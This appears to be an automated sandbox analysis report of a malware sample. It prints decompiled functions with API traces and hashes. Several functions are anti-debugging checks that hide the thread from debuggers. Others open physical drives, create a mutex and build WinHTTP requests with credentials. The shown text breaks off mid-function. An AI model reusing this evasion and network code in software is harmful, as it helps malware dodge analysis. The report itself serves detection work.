                                                                                                                                                      0x1001da95
                                                                                                                                                      0x1001da9f
                                                                                                                                                      0x1001dabc
                                                                                                                                                      0x1001dac2
                                                                                                                                                      0x1001dad8
                                                                                                                                                      0x1001dade
                                                                                                                                                      0x1001dae5
                                                                                                                                                      0x1001dbce
                                                                                                                                                      0x1001dbd4
                                                                                                                                                      0x1001dbda
                                                                                                                                                      0x1001dbe4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dbeb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dbe6
                                                                                                                                                      0x1001daeb
                                                                                                                                                      0x1001daf5
                                                                                                                                                      0x1001daff
                                                                                                                                                      0x1001db09
                                                                                                                                                      0x1001db21
                                                                                                                                                      0x1001db26
                                                                                                                                                      0x1001db50
                                                                                                                                                      0x1001db58
                                                                                                                                                      0x1001db68
                                                                                                                                                      0x1001db85
                                                                                                                                                      0x1001db9d
                                                                                                                                                      0x1001dba2
                                                                                                                                                      0x1001dba7
                                                                                                                                                      0x1001dba9
                                                                                                                                                      0x1001dba9
                                                                                                                                                      0x1001dba7
                                                                                                                                                      0x1001dbb4
                                                                                                                                                      0x1001dbbe
                                                                                                                                                      0x1001dbcb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dbc0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dbc0
                                                                                                                                                      0x1001dbbe
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                      • CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                      • _memset.LIBCMT ref: 1001DB21
                                                                                                                                                      • DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DB50
                                                                                                                                                      • _memset.LIBCMT ref: 1001DB68
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DBB4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$ChangeCloseControlCreateDeviceFileFindNotificationwsprintf
                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
                                                                                                                                                      • API String ID: 198797371-2935326385
                                                                                                                                                      • Opcode ID: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
                                                                                                                                                      • Instruction ID: bc891f1c4ccce3a70caf683a604835e8428f56d0e5539b736f6604e1ef8a2667
                                                                                                                                                      • Opcode Fuzzy Hash: 7967e660f866846cce4441d868a450291a2d59336fe704930f3578c37a1dd60c
                                                                                                                                                      • Instruction Fuzzy Hash: A6412B75D40218EBEB10EB90DC99FDDB7B8EB14704F108599E509AA281D7B4AB88CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019F00, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26librarynativeloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E10019F00() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 1;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 0x1f,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000001;
			}






                                                                                                                                                      0x10019f06
                                                                                                                                                      0x10019f18
                                                                                                                                                      0x10019f2a
                                                                                                                                                      0x10019f3e
                                                                                                                                                      0x10019f4d

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F12
                                                                                                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F24
                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000001F,00000001,00000004,00000000), ref: 10019F37
                                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 10019F3E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                      • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                      • API String ID: 3653371871-801751246
                                                                                                                                                      • Opcode ID: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                      • Instruction ID: 96ba2470dd98e020bf0cfbce012c3df4c205278cc2531598ec11657ea2300d3b
                                                                                                                                                      • Opcode Fuzzy Hash: 299e7fd2ffe35789e5c5ceba6014bb3d0f648db3e037f5c09f603e7f91a54977
                                                                                                                                                      • Instruction Fuzzy Hash: F5F03075D00208FFEB00DFE0CC8DADCBB74EB04301F508094FA01A6140D6745A48CB61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019F50, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26librarynativeloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E10019F50() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 0x1e,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}






                                                                                                                                                      0x10019f56
                                                                                                                                                      0x10019f68
                                                                                                                                                      0x10019f7a
                                                                                                                                                      0x10019f8e
                                                                                                                                                      0x10019f9d

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019F62
                                                                                                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F74
                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019F87
                                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 10019F8E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                      • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                      • API String ID: 3653371871-801751246
                                                                                                                                                      • Opcode ID: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                      • Instruction ID: 4290971ec9e7b3841b7fe9691c0d5d42a9a3d927b1d111e6c5789e877817e371
                                                                                                                                                      • Opcode Fuzzy Hash: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                      • Instruction Fuzzy Hash: 7FF0A575900218FBEB00EBE0DD89BDDBBB8EB04705F618498EA01A6280DA745A49DB65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019FA0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 26librarynativeloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E10019FA0() {
				void _v8;
				_Unknown_base(*)()* _v12;
				struct HINSTANCE__* _v16;

				_v8 = 0;
				_v16 = LoadLibraryA("Ntdll.dll");
				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
				NtQueryInformationProcess(GetCurrentProcess(), 7,  &_v8, 4, 0);
				return 0 | _v8 != 0x00000000;
			}






                                                                                                                                                      0x10019fa6
                                                                                                                                                      0x10019fb8
                                                                                                                                                      0x10019fca
                                                                                                                                                      0x10019fde
                                                                                                                                                      0x10019fed

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FB2
                                                                                                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FC4
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 10019FD7
                                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000), ref: 10019FDE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$AddressCurrentInformationLibraryLoadProcQuery
                                                                                                                                                      • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                      • API String ID: 3653371871-801751246
                                                                                                                                                      • Opcode ID: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                      • Instruction ID: a091bf084543d9cc22bc0e3cc688341cf2a1c1168494879eaf10af3ffd9ffb2e
                                                                                                                                                      • Opcode Fuzzy Hash: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                      • Instruction Fuzzy Hash: EEF0C075D44208FFEB00DFE0DD4DB9DBBB8EB04301F518494FA05A6180D7745A49CB65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019D40, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 20librarythreadnativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E10019D40() {
				_Unknown_base(*)()* _v8;
				struct HINSTANCE__* _v12;

				_v12 = LoadLibraryA("Ntdll.dll");
				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
				return NtSetInformationThread(GetCurrentThread(), 0x11, 0, 0);
			}





                                                                                                                                                      0x10019d51
                                                                                                                                                      0x10019d63
                                                                                                                                                      0x10019d79

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(Ntdll.dll,?,100206A1), ref: 10019D4B
                                                                                                                                                      • GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019D5D
                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 10019D6C
                                                                                                                                                      • NtSetInformationThread.NTDLL(00000000,?,100206A1), ref: 10019D73
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Thread$AddressCurrentInformationLibraryLoadProc
                                                                                                                                                      • String ID: Ntdll.dll$ZwSetInformationThread
                                                                                                                                                      • API String ID: 1707985920-1680533912
                                                                                                                                                      • Opcode ID: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
                                                                                                                                                      • Instruction ID: 29caf765b55be7bf21a38254d48f72174c1d944e91014696290b2e85dee50fc2
                                                                                                                                                      • Opcode Fuzzy Hash: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
                                                                                                                                                      • Instruction Fuzzy Hash: 5CE0EC74940208FBFF00EBE0AD8DB9CBB78FB04702F618095FE01A6280DAB059058AB5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A0F0, Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A0F0(CHAR* _a4) {
				struct _SECURITY_DESCRIPTOR _v24;
				int _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				int _v44;
				void* _t19;

				_v44 = 0;
				_v28 = 0;
				InitializeSecurityDescriptor( &_v24, 1);
				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor =  &_v24;
				_t19 = CreateMutexA( &_v40, 0, _a4); // executed
				_v28 = _t19;
				if(_v28 != 0 && GetLastError() == 0xb7) {
					_v44 = 1;
				}
				return _v44;
			}








                                                                                                                                                      0x1001a0f6
                                                                                                                                                      0x1001a0fd
                                                                                                                                                      0x1001a10a
                                                                                                                                                      0x1001a11a
                                                                                                                                                      0x1001a120
                                                                                                                                                      0x1001a127
                                                                                                                                                      0x1001a131
                                                                                                                                                      0x1001a13e
                                                                                                                                                      0x1001a144
                                                                                                                                                      0x1001a14b
                                                                                                                                                      0x1001a15a
                                                                                                                                                      0x1001a15a
                                                                                                                                                      0x1001a167

                                                                                                                                                      APIs
                                                                                                                                                      • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A10A
                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A11A
                                                                                                                                                      • CreateMutexA.KERNELBASE(0000000C,00000000,10020584), ref: 1001A13E
                                                                                                                                                      • GetLastError.KERNEL32 ref: 1001A14D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4085719312-0
                                                                                                                                                      • Opcode ID: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
                                                                                                                                                      • Instruction ID: 94a843d0d969dde2b410f28b1faa04b0eb5ecf9004c44cc09fbfa4c27db3ef7e
                                                                                                                                                      • Opcode Fuzzy Hash: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
                                                                                                                                                      • Instruction Fuzzy Hash: 5A01BF70900309DFEB10DF90C999BDEBBB4EB08705F604504E605B6290D7B59A85CBB5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403E2C, Relevance: 3.1, Strings: 2, Instructions: 598COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $x
                                                                                                                                                      • API String ID: 0-1748666202
                                                                                                                                                      • Opcode ID: e84a4b1fe85f02c62d7a62b5bc4dfa46dd453f8c397be7b3a17eb49e2c714a21
                                                                                                                                                      • Instruction ID: aa339394663b1c9bf1ad48bc75b0acdc95e04a6640d98f64b81da8255bd58d0e
                                                                                                                                                      • Opcode Fuzzy Hash: e84a4b1fe85f02c62d7a62b5bc4dfa46dd453f8c397be7b3a17eb49e2c714a21
                                                                                                                                                      • Instruction Fuzzy Hash: A8F11371B041149FCB09DE78C6943BE7BE2AB8A320F34457EEA03E3785EB788D509655
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A170, Relevance: 3.0, APIs: 2, Instructions: 21fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A170(CHAR* _a4) {
				struct _WIN32_FIND_DATAA _v324;
				intOrPtr _v328;
				void* _v332;
				void* _t11;

				_v328 = 0;
				_t11 = FindFirstFileA(_a4,  &_v324); // executed
				_v332 = _t11;
				if(_v332 != 0xffffffff) {
					_v328 = _v324.nFileSizeLow;
				}
				FindClose(_v332); // executed
				return _v328;
			}







                                                                                                                                                      0x1001a179
                                                                                                                                                      0x1001a18e
                                                                                                                                                      0x1001a194
                                                                                                                                                      0x1001a1a1
                                                                                                                                                      0x1001a1a9
                                                                                                                                                      0x1001a1a9
                                                                                                                                                      0x1001a1b6
                                                                                                                                                      0x1001a1c5

                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileA.KERNELBASE(1001A679,?), ref: 1001A18E
                                                                                                                                                      • FindClose.KERNELBASE(000000FF), ref: 1001A1B6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                      • Opcode ID: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                      • Instruction ID: 097559f34e7186eb2c7e5fd791b7ca3a953ceb1394cb31efbd5b4482c630521c
                                                                                                                                                      • Opcode Fuzzy Hash: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                      • Instruction Fuzzy Hash: 66F0C974D0022C9BDB70DF64DD88BDDB7B8AB48310F1042D4E91DA32A0DA30AED58F50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019FF0, Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 37%
                                                                                                                                                      			E10019FF0(void* __ecx) {
				char _v8;

				__imp__CheckRemoteDebuggerPresent(GetCurrentProcess(),  &_v8, __ecx); // executed
				return _v8;
			}




                                                                                                                                                      0x10019fff
                                                                                                                                                      0x1001a00b

                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000001,?,?,1001A032,?,?,1001A0C0), ref: 10019FF8
                                                                                                                                                      • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?,?,1001A032,?,?,1001A0C0), ref: 10019FFF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CheckCurrentDebuggerPresentProcessRemote
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3244773808-0
                                                                                                                                                      • Opcode ID: 8cf1fe81f6f864816b257ae7aa1445d5809d52eafb48723ac30665233529113e
                                                                                                                                                      • Instruction ID: 1968f35720b6d0cf004a0d8eaef2a233a09a3f8537d50a9d5b5f9af22a971398
                                                                                                                                                      • Opcode Fuzzy Hash: 8cf1fe81f6f864816b257ae7aa1445d5809d52eafb48723ac30665233529113e
                                                                                                                                                      • Instruction Fuzzy Hash: DDC0127680020CBBCB00DBE0CC8C88AB7ACEA08211B200185F909C3200DA32AA088AA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10021AF0, Relevance: 100.4, APIs: 42, Strings: 15, Instructions: 641timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 47%
                                                                                                                                                      			E10021AF0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, signed int _a24, long _a28, long _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68) {
				signed int _v8;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v40;
				long _v44;
				WCHAR* _v48;
				long _v52;
				short _v54;
				short _v58;
				short _v62;
				short _v66;
				short _v70;
				char _v72;
				long _v76;
				long _v80;
				intOrPtr _v84;
				long _v88;
				signed int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v112;
				signed int _v116;
				char _v120;
				signed int _v124;
				long _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				signed int _v140;
				char _v28334;
				char _v28336;
				intOrPtr _v28340;
				intOrPtr _v28344;
				char _v28862;
				short _v28864;
				long _v28868;
				long _v28872;
				long _v28876;
				intOrPtr _v28880;
				intOrPtr _v28884;
				char _v28912;
				char _v28940;
				long _v28944;
				intOrPtr _v28948;
				intOrPtr _v28952;
				intOrPtr _v28956;
				long _v28960;
				intOrPtr _v28964;
				intOrPtr _v28968;
				intOrPtr _v28972;
				intOrPtr _v28976;
				void* __ebp;
				long _t263;
				intOrPtr _t267;
				long _t268;
				signed int* _t276;
				long _t277;
				long _t279;
				long _t288;
				long _t292;
				long _t295;
				long _t298;
				long _t311;
				intOrPtr _t330;
				intOrPtr _t470;
				void* _t471;
				void* _t473;
				void* _t479;

				_t469 = __esi;
				_t468 = __edi;
				_t357 = __ebx;
				_push(0xffffffff);
				_push(E10022BD7);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t470;
				E10018AA0(0x7120);
				_v32 = 0;
				_v24 = 0;
				_v36 = 0;
				_v28 = 0;
				_v20 = 0x50;
				_v40 = 0;
				_t263 = E100211B0(__ebx, __edi, __esi, _a16,  &_v24,  &_v36,  &_v28,  &_v20,  &_v40);
				_t471 = _t470 + 0x18;
				_v32 = _t263;
				if(_v32 == 0) {
					L66:
					 *[fs:0x0] = _v16;
					return _v32;
				} else {
					_v32 = 0;
					_v48 = "----WebKitFormBoundaryovEAlxca0DiIz7tl";
					_v76 = E1001A370(__ebx, __edi, __esi, _v28);
					_t267 = E1001A370(__ebx, __edi, __esi, _v40);
					_t473 = _t471 + 8;
					_v84 = _t267;
					_v72 = 0;
					_v70 = 0;
					_v66 = 0;
					_v62 = 0;
					_v58 = 0;
					_v54 = 0;
					_t268 = _a20;
					_v28944 = _t268;
					if(_v28944 == 1) {
						_t268 = E1000E743(0,  &_v72, 0xa, L"GET");
						_t473 = _t473 + 0xc;
					} else {
						if(_v28944 > 1) {
							if(_v28944 <= 3) {
								_t268 = E1000E743( &_v72,  &_v72, 0xa, L"POST");
								_t473 = _t473 + 0xc;
							}
						}
					}
					_v88 = 0;
					_v44 = 0;
					_v80 = 0;
					_v52 = 0;
					__imp__WinHttpOpen(L"A WinHTTP Example Program/1.0", 0, 0, 0, 0); // executed
					_v44 = _t268;
					if(_v44 == 0) {
						L59:
						__eflags = _v52;
						if(_v52 != 0) {
							__imp__WinHttpCloseHandle(_v52);
						}
						__eflags = _v80;
						if(_v80 != 0) {
							__imp__WinHttpCloseHandle(_v80);
						}
						__eflags = _v44;
						if(__eflags != 0) {
							__imp__WinHttpCloseHandle(_v44);
						}
						_push(_v84);
						E1000CA30(_t357, _t468, _t469, __eflags);
						_push(_v76);
						E1000CA30(_t357, _t468, _t469, __eflags);
						_push(_v36);
						E1000CA30(_t357, _t468, _t469, __eflags);
						_push(_v28);
						E1000CA30(_t357, _t468, _t469, __eflags);
						_push(_v40);
						E1000CA30(_t357, _t468, _t469, __eflags);
						goto L66;
					}
					_t504 = _a4;
					if(_a4 != 0) {
						_v100 = E1001A370(_t357, _t468, _t469, _a4);
						_v112 = 3;
						_v108 = _v100;
						_v104 = 0x10024f9c;
						__imp__WinHttpSetOption(_v44, 0x26,  &_v112, 0xc);
						_push(_v100);
						E1000CA30(_t357, _t468, _t469, _t504);
						_t473 = _t473 + 8;
					}
					asm("sbb edx, edx");
					_v92 =  ~_a24 & 0x00000002;
					_t276 =  &_v92;
					__imp__WinHttpSetOption(_v44, 0x58, _t276, 4);
					_v96 = _t276;
					_t277 = _v76;
					__imp__WinHttpConnect(_v44, _t277, _v20, 0);
					_v80 = _t277;
					if(_v80 == 0) {
						goto L59;
					}
					_v116 = 0x100;
					if(_v24 != 0) {
						_v116 = _v116 | 0x00800000;
					}
					_t279 = _v80;
					__imp__WinHttpOpenRequest(_t279,  &_v72, _v84, L"HTTP/1.1", 0, 0, _v116); // executed
					_v52 = _t279;
					if(_v52 == 0) {
						goto L59;
					} else {
						if(_a8 != 0) {
							_t510 = _a12;
							if(_a12 != 0) {
								_v132 = E1001A370(_t357, _t468, _t469, _a8);
								_v136 = E1001A370(_t357, _t468, _t469, _a12);
								__imp__WinHttpSetCredentials(_v52, 1, 1, _v132, _v136, 0);
								_push(_v132);
								E1000CA30(_t357, _t468, _t469, _t510);
								_push(_v136);
								E1000CA30(_t357, _t468, _t469, _t510);
								_t473 = _t473 + 0x10;
							}
						}
						_v120 = 4;
						__imp__WinHttpQueryOption(_v52, 0x1f,  &_v116,  &_v120);
						_v116 = _v116 | 0x00000100;
						_v116 = _v116 | 0x00002000;
						_v116 = _v116 | 0x00001000;
